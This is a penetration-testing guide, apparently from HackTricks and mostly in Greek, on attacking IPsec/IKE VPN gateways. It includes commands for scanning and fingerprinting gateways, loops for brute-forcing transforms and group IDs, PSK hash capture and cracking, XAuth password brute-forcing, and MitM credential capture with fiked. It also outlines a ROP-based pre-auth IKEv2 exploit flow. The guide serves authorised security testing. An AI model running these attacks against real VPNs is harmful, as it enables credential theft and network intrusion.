500/udp - Pentesting IPsec/IKE VPN

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Βασικές Πληροφορίες

IPsec αναγνωρίζεται ευρέως ως η κύρια τεχνολογία για την ασφάλιση των επικοινωνιών μεταξύ δικτύων (LAN-to-LAN) και από απομακρυσμένους χρήστες προς την πύλη του δικτύου (remote access), λειτουργώντας ως η ραχοκοκαλιά για λύσεις VPN σε επιχειρήσεις.

Η εγκαθίδρυση μιας security association (SA) μεταξύ δύο σημείων διαχειρίζεται από το IKE, το οποίο λειτουργεί υπό την ομπρέλα του ISAKMP, ενός πρωτοκόλλου σχεδιασμένου για πιστοποίηση και ανταλλαγή κλειδιών. Αυτή η διαδικασία εξελίσσεται σε αρκετές φάσεις:

  • Phase 1: Δημιουργείται ένα ασφαλές κανάλι μεταξύ δύο endpoints. Αυτό επιτυγχάνεται μέσω της χρήσης ενός Pre-Shared Key (PSK) ή πιστοποιητικών, χρησιμοποιώντας είτε main mode, που περιλαμβάνει τρία ζεύγη μηνυμάτων, είτε aggressive mode.
  • Phase 1.5: Αν και δεν είναι υποχρεωτική, αυτή η φάση, γνωστή ως Extended Authentication Phase, επαληθεύει την ταυτότητα του χρήστη που προσπαθεί να συνδεθεί απαιτώντας username και password.
  • Phase 2: Αυτή η φάση αφιερώνεται στη διαπραγμάτευση των παραμέτρων για την ασφάλεια των δεδομένων με ESP και AH. Επιτρέπει τη χρήση αλγορίθμων διαφορετικών από αυτούς της Phase 1 για να εξασφαλιστεί το Perfect Forward Secrecy (PFS), ενισχύοντας την ασφάλεια.

Προεπιλεγμένη θύρα: 500/udp

Συχνά εκτεθειμένη επίσης: 4500/udp (NAT Traversal)

Εντοπίστε την υπηρεσία χρησιμοποιώντας nmap

root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT    STATE SERVICE
500/udp open  isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)

Εύρεση έγκυρου μετασχηματισμού

Η διαμόρφωση του IPSec μπορεί να έχει ρυθμιστεί ώστε να αποδέχεται μόνο έναν ή λίγους μετασχηματισμούς. Ένας μετασχηματισμός είναι ένας συνδυασμός τιμών. Each transform περιέχει διάφορα χαρακτηριστικά όπως DES ή 3DES ως ο αλγόριθμος κρυπτογράφησης, SHA ή MD5 ως ο αλγόριθμος ακεραιότητας, a pre-shared key ως ο τύπος αυθεντικοποίησης, Diffie-Hellman 1 ή 2 ως ο αλγόριθμος κατανομής κλειδιού και 28800 δευτερόλεπτα ως η διάρκεια ζωής.

Έτσι, το πρώτο που πρέπει να κάνετε είναι να βρείτε έναν έγκυρο μετασχηματισμό, ώστε ο server να μιλήσει μαζί σας. Για αυτό μπορείτε να χρησιμοποιήσετε το εργαλείο ike-scan. Κατά προεπιλογή, Ike-scan λειτουργεί σε main mode και στέλνει ένα πακέτο προς το gateway με κεφαλίδα ISAKMP και μία ενιαία πρόταση με οκτώ transforms μέσα της.

Ανάλογα με την απάντηση μπορείτε να λάβετε κάποιες πληροφορίες για το endpoint:

root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify

Όπως μπορείτε να δείτε στην προηγούμενη απάντηση, υπάρχει ένα πεδίο με όνομα AUTH και τιμή PSK. Αυτό σημαίνει ότι το vpn είναι διαμορφωμένο χρησιμοποιώντας ένα preshared key (και αυτό είναι πολύ καλό για έναν pentester).
Η τιμή της τελευταίας γραμμής είναι επίσης πολύ σημαντική:

  • 0 returned handshake; 0 returned notify: Αυτό σημαίνει ότι ο στόχος not an IPsec gateway.
  • 1 returned handshake; 0 returned notify: Αυτό σημαίνει ότι ο target is configured for IPsec and is willing to perform IKE negotiation, and either one or more of the transforms you proposed are acceptable (a valid transform will be shown in the output).
  • 0 returned handshake; 1 returned notify: VPN gateways ανταποκρίνονται με ένα notify μήνυμα όταν none of the transforms are acceptable (though some gateways do not, in which case further analysis and a revised proposal should be tried).

Τότε, σε αυτή την περίπτωση έχουμε ήδη μια έγκυρη transformation, αλλά αν βρίσκεστε στην 3η περίπτωση, θα χρειαστεί να κάνετε λίγο brute-force για να βρείτε μια έγκυρη transformation:

First of all you need to create all the possible transformations:

for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done

Και στη συνέχεια brute-force το καθένα χρησιμοποιώντας ike-scan (αυτό μπορεί να πάρει μερικά λεπτά):

while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt

Αν το brute-force δεν λειτούργησε, ίσως ο διακομιστής ανταποκρίνεται χωρίς handshakes ακόμη και σε valid transforms. Τότε, μπορείς να δοκιμάσεις το ίδιο brute-force αλλά χρησιμοποιώντας aggressive mode:

while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt

Ελπίζουμε ότι θα επιστραφεί μια έγκυρη μετατροπή.
Μπορείτε να δοκιμάσετε την ίδια επίθεση χρησιμοποιώντας iker.py.
Μπορείτε επίσης να δοκιμάσετε brute force για τις μετατροπές με ikeforce:

./ikeforce.py <IP> # No parameters are required for scan -h for additional help

In DH Group: 14 = 2048-bit MODP and 15 = 3072-bit
2 = HMAC-SHA = SHA1 (in this case). The --trans format is $Enc,$Hash,$Auth,$DH

Cisco συνιστά να αποφεύγονται οι DH groups 1 και 2 γιατί δεν είναι αρκετά ισχυροί. Οι ειδικοί πιστεύουν ότι χώρες με μεγάλα μέσα μπορούν εύκολα να σπάσουν την κρυπτογράφηση των δεδομένων που χρησιμοποιούν αυτές τις αδύναμες ομάδες. Αυτό γίνεται με τη χρήση μιας ειδικής μεθόδου που τους προετοιμάζει να σπάσουν τους κωδικούς γρήγορα. Παρόλο που απαιτεί μεγάλο κόστος για την υλοποίηση αυτής της μεθόδου, επιτρέπει σε αυτές τις ισχυρές χώρες να διαβάζουν τα κρυπτογραφημένα δεδομένα σε πραγματικό χρόνο εάν χρησιμοποιείται μια ομάδα που δεν είναι ισχυρή (όπως 1,024-bit ή μικρότερη).

Server fingerprinting

Στη συνέχεια, μπορείτε να χρησιμοποιήσετε το ike-scan για να προσπαθήσετε να εντοπίσετε τον vendor της συσκευής. Το εργαλείο στέλνει μια αρχική πρόταση και σταματάει το replay. Έπειτα, θα αναλύσει τη διαφορά χρόνου μεταξύ των ληφθέντων μηνυμάτων από τον server και του αντίστοιχου προτύπου απάντησης· έτσι ο pentester μπορεί να fingerprint με επιτυχία τον vendor της VPN gateway. Επιπλέον, μερικοί VPN servers θα χρησιμοποιήσουν το προαιρετικό Vendor ID (VID) payload με IKE.

Καθορίστε την έγκυρη μετατροπή αν χρειάζεται (using –trans)

Αν το IKE εντοπίσει ποιος είναι ο vendor, θα το εμφανίσει:

root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

IKE Backoff Patterns:

IP Address       No.  Recv time            Delta Time
172.16.21.200    1    1322286031.744904    0.000000
172.16.21.200    2    1322286039.745081    8.000177
172.16.21.200    3    1322286047.745989    8.000908
172.16.21.200    4    1322286055.746972    8.000983
172.16.21.200    Implementation guess: Cisco VPN Concentrator

Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify

Αυτό μπορεί επίσης να επιτευχθεί με nmap script ike-version

Ειδικό για IKEv2: WatchGuard Vendor ID version fingerprinting

Ορισμένοι IKEv2 daemons περιλαμβάνουν μη-τυποποιημένα Vendor ID payloads στην IKE_SA_INIT response. Το WatchGuard Fireware OS κωδικοποιεί την έκδοση/build της συσκευής απευθείας μέσα στο VID, επιτρέποντας single-packet, pre-auth fingerprinting.

  • Μεταφορά: UDP/500 (και UDP/4500 για NAT-T)
  • Πακέτο: Η IKE_SA_INIT response περιέχει ένα ή περισσότερα Vendor ID payloads
  • WatchGuard format: 32-byte hash ακολουθούμενο από base64 που αποκωδικοποιείται σε π.χ. VN=12.11.3 BN=719894

Παράδειγμα raw bytes από ένα WatchGuard VID payload (τα τελευταία 12 bytes είναι base64):

00000000: bfc2 2e98 56ba 9936 11c1 1e48 a6d2 0807  ....V..6...H....
00000010: a95b edb3 9302 6a49 e60f ac32 7bb9 601b  .[....jI...2{.`.
00000020: 566b 3439 4d54 4975 4d54 4575 4d79 4243  Vk49MTIuMTEuMyBC
00000030: 546a 3033 4d54 6b34 4f54 513d            Tj03MTk4OTQ=

Γρήγορη εξαγωγή σε shell όταν έχεις το base64 tail:

echo 'Vk49MTIuMTEuMyBCTj03MTk4OTQ=' | base64 -d
# VN=12.11.3 BN=719894

Σημειώσεις

  • Αυτό δεν αποτελεί μέρος κανενός IKEv2 RFC. Θεωρήστε το ως μια ιδιορρυθμία του vendor για γρήγορο εντοπισμό εκτεθειμένων/ευάλωτων εκδόσεων Fireware OS.
  • Χρειάζεστε μόνο να προκαλέσετε μια IKE_SA_INIT απάντηση· δεν απαιτείται authentication.

Finding the correct ID (group name)

Για να σας επιτραπεί να συλλέξετε το hash χρειάζεστε μια έγκυρη transformation που υποστηρίζει Aggressive mode και το σωστό ID (όνομα ομάδας). Πιθανότατα δεν θα γνωρίζετε το έγκυρο όνομα ομάδας, οπότε θα χρειαστεί να το brute-force.
Για αυτό, θα σας πρότεινα 2 μεθόδους:

Bruteforcing ID with ike-scan

Πρώτα απ’ όλα δοκιμάστε να στείλετε ένα αίτημα με ένα ψεύτικο ID προσπαθώντας να συλλέξετε το hash (“-P”):

ike-scan -P -M -A -n fakeID <IP>

Αν δεν επιστραφεί κανένα hash, τότε πιθανώς αυτή η μέθοδος brute forcing θα δουλέψει. Αν επιστραφεί κάποιο hash, αυτό σημαίνει ότι ένα ψεύτικο hash θα σταλεί πίσω για ένα ψεύτικο ID, οπότε αυτή η μέθοδος δεν θα είναι αξιόπιστη για να brute-force το ID. Για παράδειγμα, μπορεί να επιστραφεί ένα ψεύτικο hash (αυτό συμβαίνει σε σύγχρονες εκδόσεις):

Αλλά, όπως είπα, αν δεν επιστραφεί κανένα hash, τότε θα πρέπει να προσπαθήσετε να brute-force συνηθισμένα ονόματα ομάδων χρησιμοποιώντας ike-scan.

Αυτό το script θα προσπαθήσει να brute-force πιθανά IDs και θα επιστρέψει τα IDs όπου επιστρέφεται ένα έγκυρο handshake (αυτό θα είναι ένα έγκυρο όνομα ομάδας).

Αν έχετε ανακαλύψει μια συγκεκριμένη μετατροπή, προσθέστε την στην εντολή ike-scan. Και αν έχετε ανακαλύψει διάφορες μετατροπές, αισθανθείτε ελεύθεροι να προσθέσετε έναν νέο βρόχο για να τις δοκιμάσετε όλες (πρέπει να τις δοκιμάσετε όλες μέχρι κάποια να λειτουργήσει σωστά).

Μπορείτε να χρησιμοποιήσετε το λεξικό του ikeforce ή αυτό στο seclists με κοινά ονόματα ομάδων για να τα brute-force:

while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt

Or use this dict (is a combination of the other 2 dicts without repetitions):

Bruteforcing ID with Iker

iker.py also uses ike-scan to bruteforce possible group names. It follows it’s own method to find a valid ID based on the output of ike-scan.

Bruteforcing ID with ikeforce

ikeforce.py is a tool that can be used to brute force IDs also. This tool will try to exploit different vulnerabilities that could be used to distinguish between a valid and a non-valid ID (could have false positives and false negatives, that is why I prefer to use the ike-scan method if possible).

By default ikeforce will send at the beginning some random ids to check the behaviour of the server and determinate the tactic to use.

  • The first method is to brute-force the group names by searching for the information Dead Peer Detection DPD of Cisco systems (this info is only replayed by the server if the group name is correct).
  • The second method available is to checks the number of responses sent to each try because sometimes more packets are sent when the correct id is used.
  • The third method consist on searching for “INVALID-ID-INFORMATION” in response to incorrect ID.
  • Finally, if the server does not replay anything to the checks, ikeforce will try to brute force the server and check if when the correct id is sent the server replay with some packet.
    Obviously, the goal of brute forcing the id is to get the PSK when you have a valid id. Then, with the id and PSK you will have to bruteforce the XAUTH (if it is enabled).

If you have discovered an specific transformation add it in the ikeforce command. And if you have discovered several transformations feel free to add a new loop to try them all (you should try them all until one of them is working properly).

git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library

./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic

Sniffing ID

(Από το βιβλίο Network Security Assessment: Know Your Network): Είναι επίσης δυνατό να αποκτηθούν έγκυρα ονόματα χρήστη με το sniffing της σύνδεσης μεταξύ του VPN client και του server, καθώς το πρώτο aggressive mode πακέτο που περιέχει το client ID αποστέλλεται σε μη κρυπτογραφημένη μορφή

Συλλογή & cracking του hash

Τέλος, αν έχετε βρει ένα valid transformation και το group name και αν το aggressive mode επιτρέπεται, τότε μπορείτε πολύ εύκολα να πάρετε το crackable hash:

ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor

Το hash θα αποθηκευτεί μέσα στο hash.txt.

Μπορείτε να χρησιμοποιήσετε psk-crack, john (χρησιμοποιώντας ikescan2john.py) και hashcat για να crack το hash:

psk-crack -d <Wordlist_path> psk.txt

XAuth

Aggressive mode IKE combined with a Pre-Shared Key (PSK) είναι συνήθως σε χρήση για σκοπούς group authentication. Αυτή η μέθοδος ενισχύεται με XAuth (Extended Authentication), που εισάγει ένα επιπλέον επίπεδο user authentication. Τέτοια authentication συνήθως βασίζεται σε υπηρεσίες όπως Microsoft Active Directory, RADIUS, ή παρόμοια συστήματα.

Με το πέρασμα σε IKEv2, παρατηρείται μια σημαντική αλλαγή όπου το EAP (Extensible Authentication Protocol) χρησιμοποιείται αντί του XAuth για την πιστοποίηση χρηστών. Αυτή η αλλαγή υπογραμμίζει μια εξέλιξη στις πρακτικές authentication εντός των ασφαλών πρωτοκόλλων επικοινωνίας.

Τοπικό δίκτυο MitM για καταγραφή διαπιστευτηρίων

Έτσι μπορείτε να καταγράψετε τα δεδομένα του login χρησιμοποιώντας fiked και να δείτε αν υπάρχει κάποιο προεπιλεγμένο username (Πρέπει να ανακατευθύνετε την κίνηση IKE προς το fiked για sniffing, κάτι που μπορεί να γίνει με τη βοήθεια ARP spoofing, more info). fiked θα λειτουργήσει ως VPN endpoint και θα καταγράψει τα διαπιστευτήρια XAuth:

fiked -g <IP> -k testgroup:secretkey -l output.txt -d

Επίσης, χρησιμοποιώντας IPSec προσπαθήστε να πραγματοποιήσετε μια MitM επίθεση και να μπλοκάρετε όλη την κίνηση προς την port 500. Αν το IPSec tunnel δεν μπορεί να εγκατασταθεί, ίσως η κίνηση να σταλεί σε μη κρυπτογραφημένη μορφή.

Brute-forcing XAUTH username ad password with ikeforce

Για να brute force το XAUTH (όταν γνωρίζετε ένα έγκυρο group name id και το psk) μπορείτε να χρησιμοποιήσετε ένα username ή λίστα usernames και λίστα passwords:

./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]

Με αυτόν τον τρόπο, το ikeforce θα προσπαθήσει να συνδεθεί χρησιμοποιώντας κάθε συνδυασμό username:password.

Αν βρήκατε ένα ή περισσότερα έγκυρα transforms, απλά χρησιμοποιήστε τα όπως στα προηγούμενα βήματα.

Αυθεντικοποίηση με IPSEC VPN

Στο Kali, το VPNC χρησιμοποιείται για την εγκαθίδρυση IPsec tunnels. Τα profiles πρέπει να βρίσκονται στον κατάλογο /etc/vpnc/. Μπορείτε να ξεκινήσετε αυτά τα profiles χρησιμοποιώντας την εντολή vpnc.

Οι ακόλουθες εντολές και ρυθμίσεις απεικονίζουν τη διαδικασία ρύθμισης μιας σύνδεσης VPN με το VPNC:

root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP
IPSec gateway [VPN_GATEWAY_IP]
IPSec ID [VPN_CONNECTION_ID]
IPSec secret [VPN_GROUP_SECRET]
IKE Authmode psk
Xauth username [VPN_USERNAME]
Xauth password [VPN_PASSWORD]
STOP
root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0

Σε αυτή τη ρύθμιση:

  • Αντικαταστήστε [VPN_GATEWAY_IP] με την πραγματική διεύθυνση IP του VPN gateway.
  • Αντικαταστήστε [VPN_CONNECTION_ID] με το αναγνωριστικό της σύνδεσης VPN.
  • Αντικαταστήστε [VPN_GROUP_SECRET] με το group secret του VPN.
  • Αντικαταστήστε [VPN_USERNAME] και [VPN_PASSWORD] με τα διαπιστευτήρια για την πιστοποίηση στο VPN.
  • Το [PID] συμβολίζει το process ID που θα ανατεθεί όταν ξεκινήσει vpnc.

Βεβαιωθείτε ότι χρησιμοποιούνται πραγματικές, ασφαλείς τιμές για την αντικατάσταση των placeholder κατά τη ρύθμιση του VPN.

IKEv2 exploitation notes: pre-auth IDi/CERT processing bugs

Τα σύγχρονα VPN appliances συχνά εκθέτουν το IKEv2 στο UDP/500 (και στο UDP/4500 για NAT-T). Μια κοινή επιφάνεια επίθεσης pre-authentication είναι η ανάλυση των Identification (IDi) και Certificate payloads κατά τη διάρκεια του IKE_SA_AUTH.

High-level exploitation flow όταν υπάρχει ευάλωτος parser για IKEv2:

  • Στείλτε ένα έγκυρο IKE_SA_INIT για να διαπραγματευτείτε transforms και να ολοκληρώσετε το Diffie–Hellman.
  • Ακολουθήστε με IKE_SA_AUTH που φέρει ένα IDi το οποίο ενεργοποιεί το bug (π.χ. μια υπερμεγέθη Identification που αντιγράφεται σε fixed-size stack buffer πριν από την certificate validation).
  • Η προκύπτουσα memory corruption μπορεί να οδηγήσει σε έλεγχο saved-register και return-address.
  • Με NX ενεργοποιημένο αλλά άλλα mitigations απουσιάζουν (no PIE/canaries), κατασκευάστε ένα ROP chain για να καλέσετε mprotect σε μια stack page και στη συνέχεια κάντε pivot την εκτέλεση σε injected shellcode ή σε έναν resident interpreter (π.χ. /usr/bin/python3) εάν δεν υπάρχει διαθέσιμο /bin/sh.

Παραδείγματα default transforms που παρατηρήθηκαν σε ορισμένα IKEv2 appliances (WatchGuard Fireware OS 12.11.3):

  • SHA2-256–AES(256-bit) with DH Group 14
  • SHA1–AES(256-bit) with DH Group 5
  • SHA1–AES(256-bit) with DH Group 2
  • SHA1–3DES with DH Group 2

Practical tips

  • Στοχεύστε τόσο το UDP/500 όσο και το UDP/4500· NAT-T servers μπορεί να απαντούν μόνο στο 4500.
  • Αυξήστε το receive buffer και τα timeouts για UDP-based scanners για να αποφύγετε packet loss.
  • Εάν η υπηρεσία εκθέτει custom Vendor IDs (βλέπε ενότητα παραπάνω), χρησιμοποιήστε τα για γρήγορο fingerprinting των ευάλωτων εκδόσεων πριν επιχειρήσετε οποιοδήποτε exploit traffic.

Reference Material

Shodan

  • port:500 IKE
  • port:4500 "UDP"
  • udp port:500,4500 "WatchGuard"

References

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks